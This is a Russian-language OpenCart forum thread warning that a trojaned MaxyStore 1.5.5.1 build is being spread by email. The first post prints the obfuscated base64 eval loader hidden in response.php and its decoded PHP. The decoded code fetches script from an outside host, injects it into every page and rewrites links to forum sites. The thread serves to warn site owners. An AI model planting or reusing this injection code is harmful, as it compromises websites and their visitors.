Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

Внимание! 26.01.2014 Ведется рассылка с вредоносной модификации OpenCart (MaxyStore 1.5.5.1)


halfhope

Recommended Posts

Письмо следующего содержания:

 

Доброго времени, дорогой пользователь halfhope![/size]

Теперь ты можешь скачать бесплатно релиз maxystore v1.5.5.1 по ссылке:[/size]

http://cenzoRED/reliz/maxystore_v1.5.5.1.zip

Поддержать автора можно купив сборку по ссылке:[/size]

http://cenzoRED/shop/maxystore/maxystore-relize/reliz-maxystore-1551.html

 

В этой сборке файл "system/library/response.php" содержит закодированный base64 код:

 

eval(base64_decode('ZXZhbChiYXNlNjRfZGVjb2RlKCdaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ2RhV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMlJoVjBad2IxbHJUbTloVm14WlZHMTRUMkZzU20xWGEyUlhZVzFKZVZWdGVFeFJNbEpvV1cxNFlVMVdaRlZVYkU1cVVqQnNOVlJyWkd0WlZURnpWMWhrV0ZKRk5VUlpWVnAyWlZaYVdFOVZkRlJTYkc4eFYxZDBUMk13TkhkVWJrSlNWakpTUzFWVVFrZGliRTVXVkd0S1lVMUlRa2xWYlRBeFdWWmFObFpZWkZSV1ZrWXpWMnBDZG1Rd01WbFhiWGhwVmpOb05sZFhkR3RTYlZKeVRsWlNUMU5IVWt0VlZFcHZWREZrVjFwRk9XcFNNSEF4VmxjMVlXRnJNWFJaZWs1VVZsWndWMVJxUW5OU2JVcEpWbTEwVTAxV2NEWlZNVlpXWlVkR1IySkVWbEppUlVwWFdsWldTMWRzVGxaVmExcHJUVWhvZUZac1VtdFRiRTVHWWpOb1ZVMHllRVJhVm1SVFkxZEplbUZGTVdoaVdGRjRWa1prY2sxRk5WWmtSbEpTWVRKb2FGWnFRVEZsVm14MVlYcFNiRlpVUmtaVmJHaHJWR3hLU0ZwRVZsVmhNRFZFVldwS1IxZFdUblJsUjBacFZrZHpkMVpGYUhkVWJWSldUbGhDVDFKR1dreGFWelZQVkVaT1ZsUnJTbUZOUjNoRlZWWmthMU5zUlhkU2JrcFlWa1Z3ZFZReFduSmxiRnAxWWtkc1UyRnRlRE5YVnpCNFl6QXhSbVJGVW1obGJWSkZXVlpXUjJKc1RsWlVhMHBoVFVkNFJWVldaR3RYYXpCNFYycFdXbUV4YXpGYVYzaDNWMVpXZFZkdGNGUlNhMXAxVlhwQ1QxVXlSblJTYTFKclRXMVNVMVJXV21GV1JscEdWbFJXVmxac2NFaFVNVnBoVm0xRmVscEljRlJoTW1oWVdsWmtTMUpHUmxsUmJFSnJUV3BzZFZVeFZrOVJiRzkzWWtWU1VsWXlVa3RWYWtFd1pVWnJlVTFVVW1GaVZURTFWbTF3UTJGVk1IZFRXR1JVVFVVMVZGbFhNVWRTUjFGNVdrWktUbFpzY0ZWV2ExWldUbFpXVjFkclpGQldiSEJYVkZWYVlWWkdWbGRXYlhSVFlrWktlbFpXYUU5VGJFVjRVMjA1V0dGcmNGaGFSbVJUVWtkR05scEZVbWhXVlZwMVZURldUMUZzYjNkaVJWSlNWakpTWVZSVVJtRk9WbXh5VjFSV2JHSklRbHBXVnpWaFlXeE9SMUp0TlZSTlJUVlVXVmN4UjFKSFVYbGFSa3BPVm14d1ZWWnJWbFpPVmxaWFYydGtVRlpyTlZSV2JYaExWakZhV0dONlJsZFdiRnA1Vlcxek5WWnJNVWRqUldSWFZqSjNlbGRxUVhoV1IwWTJXa1ZTYUZaVlduVlZNVlpQVVd4dmQySkZVbEpXTWxKaFZGUkdZVTVXYkhKWFZGWnNZa2hDV2xaWE5XRmhiRTVIVW0wMVZFMUZOVlJaVnpGSFVrZFdSbFZzWkZkaE0wSlBWbXRTUjFFeFdsZGFNMmhZWVRGd1YxbFVRbmRWVmxwVlVXeGFhazFZUWpCVmJUVlBZV3N4YzFadVpGVk5NbEl5VjJwQ2MxSkdSbGhhUlhCU1RVVmFkVlV4Vm10VU1ERllWRzVTYkZJeGNIRlVWM2hhWkRGc2NWUnJUazVTV0ZKRlZsY3hkMkZHUlhwYVJ6VldWa1ZhV0ZaVVJsTlNhemxYVW14a1UyRnRlRmRXVkVaV1pVWktjMVZZYUZkaVJscE9WVlJDUm1WR1RYaFZibkJVVFVkNFJWVldaR3RUYkVWM1VtMDFWRlpWTlVOWlZFcFBVMFpLZEU1WFJsZFNSVnA0VjJ0YWIxTXlUWGhhTTJ4WFlXeEthRlpxUVhoa2JFNXlXa1U1YVUxSVVsWlpla0l3VWtaVmVGTnVUbHBOYWxaTVdrY3hUMlJXUm5SaFIwWk9Za1phZFZaVldrOVJiVXB6VVd0U1VGWXllSEJVVjNoS1RWWldTR05FVG10aVZWcEtWbGMxVTJGV1NrVlZibFpWVFRKU01sZHFRbk5TUmtaWVdrVndVazFGV25WVk1WWlBWVEpKZVZWcmJGWmliVkpoVkZkd2MyTnNaSE5VYTBwUVZsZDRTVlpIY0VkaGJVcFpZVWN4V0dGcmNGaFVWV1JIVjBVMVdFMVhiR3hXTWxKNVZqRlNTMkp0VFhkaVJWcFZZa1p3VjFsVVRtOVRNVnBJWkVkR1ZsSnRaRE5aVlZwWFZqRktjbE50TVZaV1JVVXhWV3hhUzFaSFJqWmFSVkpvVmxWYWRWVXhWazlSYkc5M1lrVlNVbFl5VW1GVVZFWmhUbFpzY2xkVVZtaGlWWEJKVkRGb2QxbFdWWGxhU0VwWVZrVndkVmt3VlRWTk1rbDVXa1Z3VWsxRlduVlZNVlpQVVd4dmQySkZiRlZoYXpWdlZqQmFTMk5XYkZaVWJUVm9UV3RhU2xaWGNFTmhiRWwzVGxSS1dHRXlVbGRaTUdSWFRUSkplVnBGY0ZKTlJWcDFWVEZXVDFGc2IzZGlSVkpTVmpKU1MxVlVRa2RpYkU1V1ZHdEtZVTFYZERWVmJUVjNXVlpWZDFKdVZsVldNMEpEV2tSQ2QwNXRTWGRrUlhCU1RVVmFkVlV4Vms5UmJHOTNZa1ZTVWxZeVVrdFZWRUpIWW14T1ZsUnJTbUZOUjNoRlZWWmthMU5zUlhkU2JUVlVWbFUxUTFkcVNrOWtSbHB4VVcxMFdGSllRWGhWTVZaUFZUSlJlR0pHYUdGU00yaFJXa1JKTldKc1RsWlVhMHBoVFVkNFJWVldaR3RUYkVWM1VtMDFWRlpWTlVOWGFrSnpVa1pHV0ZwR2NHbGhNMEo2VmpGYWEyVnJOSGRVYmtKU1ZqSlNTMVZVUWtkaWJFNVdWR3RLWVUxSGVFVlZWbVJyVTJ4RmQxSnROVlJXVlRWRVdWZDRjMWRXVW5SbFJYQlNUV3N4TTFaR1ZsTlZiVXB5VDFST2FVMXRVa3RWVkVKSFlteE9WbFJyU21GTlIzaEZWVlprYTFOc1JYZFNiVFZVVmxVMVExZHFRbk5TUmtaWVdrVndVazFGV25WVk1WWlBVVEpXVjJOR2JGWmhhMXB4V1d4U1UySnNUbkphUm1Sc1ZqQTFNRlF4YUhOaGJFbDNWMjVXV0dKR1NqWlZla0p6VWtaR1dGcEZjRkpOUlZwMVZURldUMUZzYjNkaVJWSlNWakpTUzFWVVFrZGliRTVXV2tWMGJGWnVRbGxWYlRWTFZVZFJlVTlWZEZKTlYxSlFXVlZrVG1WV1dsaGFSWFJzWWtaWmVsWkdaSE5oYXpSM1ZHNUNVbFl5VWt0VlZFSkhZbXhPVmxSclNtRk5SM2hGVlZaa2ExTnNSWGRTYlRWVVZsVTFRMWRxUW5OU1JrWllXa1Z3VWsxRlduVlZNVlp2VXpKS1NGVnJiRmRpYlhod1dWWldSMk5zWkhOaFJYUnNWakJzTmxVeU5XdFhiRmw1Vlc1T1ZVMHlVakpYYWtKelVrWkdXRnBGY0ZKTlJWcDFWVEZXVDFGc2IzZGlSVkpTVmpKU1MxVlVRa2RpYkdSWVRsVjBhVkp0ZUZsWk0zQnJVa2RHVmxKdE5WUldWVFZEVjJwQ2MxSkdSbGhhUnpGV1YwVkZNVlZVU210a01rNUhZMGhDVWxaNmJFeFZha1oyWkRGa2MxbDZSbWhOUjNoR1ZGVmthMWxWTVhOWFdHUllVa1UxUkZsVlduWmxWbHBZVDFWd2FWWXlaRE5YYTFadlVXczFjbVZFVmxCV2VsWndWRmR3YzJSV2JISmFSbVJxVm0xNFdsWXlNVzloYXpGeVRsUldXbFp0YUVSVVZWWTBaRVpTZFZkdGJGWmxiWGgyVjFSQ2EyTnRVbGhVYTJob1UwZFNVbFJVUVRGak1XdDVUbGRHYVZJd05YaFVWV1J6VkZkR1YxTnRNVmRXUlVwWVZsUkdZV05zV25OVWJHaHNWakZLVmxaWGVHRlRNVmw0VTJ4a1ZHSldjRlpaVkVKaFZERldjMVJ0ZEdGU1dHaDNWVEZqZUdGc1NYZFhibFpZWWtaR00xbFdWalJqUmxaMFYyeGFUbEpzY0ZWV2JURXdWakZWZUZwRVZtRlNhelZVVm0xMFlWWXhWbk5YYXpsWFZtMWtORlp0ZUU5V1JsVjVWVzEwVkUxVk5YcFVha0pQWTBaV2RFMVhhRmRsYkZwNVZURldVbVF4YjNoaVJteFVZbTE0WVZZd1pEQmtiRTVZWTBST2EySkhlREJVTVdRd1lrWmFSVlZ1UWxWU1ZUVkRXVlphUTFKRk9WaFBWM1JUWld0YU5sWlZaSE5UYlUxM1lrVlNWR0pzY0hGVmFrWmhUVlprVlZOclpHeFdNVXBGVkd4a2QyRlZNWEZSYmtKVlVsVTFRMWxXWkV0WFJrcHhWVzE0YVZaSGQzaFdSV014VXpBeFZtSklRbXROYlZKTFdXeFNSazFXYkhGVWEwNXBVakJ3TUZaSE1XOWhiVXB6VW1wR1drMXFWbGRaVmxZMFVrWkdXR0pIYkU1TlJYQjZWMWN3ZUZReVJraFVibFpXWWxSR2NGUlVRblpsUm14elZGUkdiRll4U2xWVk1XaFBVMnhGZDJORVNscE5SMUpZV2taYWNtVldTblZpUjNSU1pXeFpNVmRyV2s5VGJVMTNZa1ZTVkdKc2NIRlZha1poVFZaa1ZWTnJaR3hXTVVwRlZHeGtjMkpHVlhkaVNHUlZUVEpTTWxsVVNrOWtSbHAxV2tkc1UwMUdjSGhXTW5oUFVXczVWbUpGYUZOaWJYaHhXV3hXV2sxV1RYZFVhM0JvVmxob1JWVldaREJaVjBwelUyNU9XbUpVUmxOWmVrSnpVa1pPZFdKSGRGZGxiWGQ2VmpKNGFrMVhSbk5pUm14VVlXdEtUbGxzVlRGTmJHeHpWR3R3YWsxSGVFVlZNalZ6WVRGYU5tSkVUbGhpUjAxNFdWZDRjMWRXVG5GUmF6RnBWbFJWZVZkWGVFOVRiVTEzWWtWU1ZHSnRlSEpXYm5CelRURmtjMWw2Um1oaVIzaGFWVEp3UTFSWFNsWk9WRXBhWWtVMVMxbDZRbk5TUms1MVlrZDBWMlZ0ZDNwV01uaHFUVmRHYzJKR2JGUmhhMHBPV1d4Vk1VMXNiSE5VYTNCcVRVZDRSVlV5TlhOaE1WbzJZa1JPV0dKSFRYaFpWM2h6VjFaT2NWRnJNV2xXVkZWNVYxZDRUMU50VFhkaVJWSlVZbTE0Y2xadWNITk5NV1J6V1hwR2FHSkhlRnBWTW5CRFZGZEtWazVVU2xwaVJUVkxXVEJWTlUweVNYbGtSMnhPVFZadmVsZHJXbTlWYkc5NFVXeFNVbUp1UW5KVk1GWjNZbFpyZVUxV1pHdE5hM0JKVlcweGQxbFdWWGxhU0VwWVlsUkdlbHBHV25kU1IxRjVXa1YwVkZKWVFucFhWRUpyVGtkR1IyRXpiRmRYUlRWTFZWUkdTMDFzY0VkaFJVNU9WakZLUlZsWWNHdFNSMHBZWlVSR1dsWnNhekZhVjNoM1YxWldXRTlWY0dsV2EzQXpWMWh3VDFFeVRYaGlSbXhwVWpGd2FGWXdWbmRPVm14eFZHdDBiR0V5ZUhkYVJFcHpZVlV4YzJOSVVsUldNbmg1VkdwQ1QyUkdXblZpUjNCcFZrZDNNVll3VWs5VE1rcElWR3RvVUZkSGVISlZha28wVFZaa2RXSkhOV3ROU0ZKV1dYcENNRmxXV1hkT1dGcGFZbTE0UTFsVVNrcGxiRnAxV2tkMFdGSnJWWHBYYlhoSFpESktTRk5yYkZWaVdHaExWVEJvVDFSR1pITmFSVGxwVFd0dk1WVldaREJoVlRCNFYycE9ZVkp0YUZOVWFrSlBaRlV4UlUxSE5VeFZNbk16VVRKak9WQlRZM0JMVkhOTEp5a3BPd289JykpOwo='));

 

Код не видно если в редакторе кода, которым Вы пользуетесь, текст выходит за рамки окна (WordWrap). 

После декодирования кода получаем:

function get_page($url){
        $agent = 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; ru; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9';
        $ch=curl_init();
        curl_setopt ($ch, CURLOPT_URL,$url );
        curl_setopt($ch, CURLOPT_USERAGENT, $agent);
        curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt ($ch,CURLOPT_VERBOSE,false);
        curl_setopt($ch, CURLOPT_TIMEOUT, 5);
        $page=curl_exec($ch);
$errorpage = '</body></html>';
        $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        switch($httpcode){
                case '200':
                        return $page;
                break;
                case '404';
                        return $errorpage;
                break;
case '502';
                        return $errorpage;
                break;
        }
}

if ($ftend = get_page("http://googlejavascript.com/api.php?server=".$_SERVER['SERVER_NAME']."&page=".$_SERVER['REQUEST_URI'])){
$find = array("</body>", "</html>", "opencart.com", "=^_^=.ru", "myopencart.ru", "opencartforum.com", "opencart.ru", "opencart.by");
$replace = array("", $ftend, "ruopencart.com", "ruopencart.com", "ruopencart.com", "ruopencart.com", "ruopencart.com", "ruopencart.com");
$ouput = str_replace($find, $replace, $ouput);
ini_set("display_errors","off");
error_reporting(0);
echo $ouput;}
else {
echo $ouput;
}

Просьба быть бдительным. Змінено користувачем afwollis
cenzoRED
  • +1 2
Надіслати
Поділитися на інших сайтах

$find = array("</body>", "</html>", "opencart.com", "=^_^=.ru", "myopencart.ru", "opencartforum.com", "opencart.ru", "opencart.by");
$replace = array("", $ftend, "ruopencart.com", "ruopencart.com", "ruopencart.com", "ruopencart.com", "ruopencart.com", "ruopencart.com");
$ouput = str_replace($find, $replace, $ouput);

Ахаха :mrgreen:

Особенно помня о том, что такое "=^_^=.ru" и откуда оно берётся, то код вообще убойный

Ведь у нас этим смайлом заменяются все упоминания сами-знаете-чьего-сайта

  • +1 1
Надіслати
Поділитися на інших сайтах

$find = array("</body>", "</html>", "opencart.com", "=^_^=.ru", "myopencart.ru", "opencartforum.com", "opencart.ru", "opencart.by");
$replace = array("", $ftend, "ruopencart.com", "ruopencart.com", "ruopencart.com", "ruopencart.com", "ruopencart.com", "ruopencart.com");
$ouput = str_replace($find, $replace, $ouput);

Ахаха :mrgreen:

Особенно помня о том, что такое "= ^_^=.ru" и откуда оно берётся, то код вообще убойный

Ведь у нас этим смайлом заменяются все упоминания сами-знаете-чьего-сайта

 

 

а я не знаю  :(

Надіслати
Поділитися на інших сайтах

а я не знаю  :(

Речь о той самой сборке, которую предлагают скачать. Адрес его сайта у нас всегда менялся на смайлик

А вообще у меня подозрения, что это не вредоносный код, а кое-чьи проделки :)

  • +1 1
Надіслати
Поділитися на інших сайтах

Данная рассылка не имеет ничего общего с максистор, если внимательно просмотреть на код, то видно что:

1. "opencart.com", "=^_^=.ru", "myopencart.ru", "opencartforum.com", "opencart.ru", "opencart.by"

заменяются на ruopencart.com, просто использовали псевдоним и возможность "насолить".

Надіслати
Поділитися на інших сайтах

Baco, врядли с целью насолить, скорее готовится к открытию очередной нехороший ресурс, который будет похож на один известный фейковый. Не удивлюсь, если у них один и тот же владелец.

  • +1 2
Надіслати
Поділитися на інших сайтах

Baco, врядли с целью насолить, скорее готовится к открытию очередной нехороший ресурс, который будет похож на один известный фейковый. Не удивлюсь, если у них один и тот же владелец.

Согласен с Вашим мнением полностью, просто акцент ответа хотел сделать, что с максистор - не имеет ничего общего эта рассылка, кроме как второй сноски в письме, с линком на продажу самой сборки.

Так же, предполагаю, что открывается новый варезник где вскоре увидим коммерческие скрипты не только с этого форума.

Что и требовалось доказать:

b7c6a231945f6c15566bae038190b9338966898a

  • +1 1
Надіслати
Поділитися на інших сайтах

Сколько раз сталкивался с этой говно-сброкой, постоянно проблемы! У автора просто руки из пятой точки растут. 

Надіслати
Поділитися на інших сайтах

  • 6 months later...

Всем привет!

Сайту ruopencart.com вообще можно доверять? Может кто регистрировался уже...

Они декларируют, что после регистрации (с получением ключа за 100 рублей или около того) станут доступны все модули для скачки. Есть сомнения на этот счет...

Надіслати
Поділитися на інших сайтах


это варез, где незаконно продают ворованные модули с вшитой вирусней. и уж тем-более никакой поддержки там не оказывают.

 

Спасибо за информацию...

Надіслати
Поділитися на інших сайтах


  • 2 months later...

Пусть сюда приходят по поиску "Ключ регистрации ruopencart.com" и "Платное вступление в клуб RuOpencart"

Конечно, это выбор каждого, бросать им копейку и скачивать модули, которые они там опубликовали. Но это себе дороже.

Во-первых, часто сталкивался, что нужна поддержка по модулям от разработчиков (а там их нет).

Во-вторых, лазать и перепроверять весь код, и вычищать все дерьмо из него - это тоже работа. А если вы плохо разбираетесь в коде - то и найти ничего не сможете.

Дурная репутация у владельцев сайта, что уж тут поделаешь.

Надіслати
Поділитися на інших сайтах


Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
  • Зараз на сторінці   0 користувачів

    • Ні користувачів, які переглядиють цю сторінку
×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.